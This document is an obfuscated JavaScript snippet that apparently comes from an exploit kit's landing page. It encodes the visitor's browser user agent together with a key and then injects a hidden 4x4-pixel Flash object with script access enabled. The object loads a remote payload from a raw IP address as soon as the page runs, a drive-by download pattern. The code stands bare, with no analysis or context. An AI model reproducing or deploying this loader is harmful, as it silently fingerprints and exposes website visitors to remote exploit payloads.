/*s91120d52690hssfj19208fs*/function hgfgerdfgdf(num, width){/*s78030d76260hfj50015fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s35997d55319hfj1826fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s90538d90565hfj69219fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s18177d28724hfj35783fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd90502hfs*/c += b + d;/*s90434d74759hfj61202fs*/e += 1;}return c;}/*s25523dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.74.166/?OTMyMTY4NzM=&info=NDY3MzkxMzI=&rand=xH_QMrPYbR7FFYDfKPnEUKdEMU3WA0SKwY-ZhazVF5yxFDfGpbH1FxzspVydCFyEmvJvdLAHIwGh1UTASwQ&elsa=1n49aUltF86is2kCAzBfNiJWCrhTYNQsXqpCWRrBu0V_xx7BHI8l2xReC62BRzOgtUVgW5QsTn6_7VaOO-w&reinz=MjMxOTA4OTI=", ghnvbn("http://188.225.74.166/?OTE1ODM0NDQ=&info=NDQ2ODQ3ODA=&rand=xXzQMvWdbRXQC53EKvrcT6NEMVHRH0CL2Y-dmrHTefjaeVWkzrLFTF_xozKASwSG6_FtdfJSDV&elsa=fij0KALQRlntpfB19C9qGu3UCAnUSe1ZTQ_ECEZQtNrMGXRbM72l_0z7AkecsmxhaK61ENjOge&reinz=NDAxMTcwMzg=","aexykukusa"));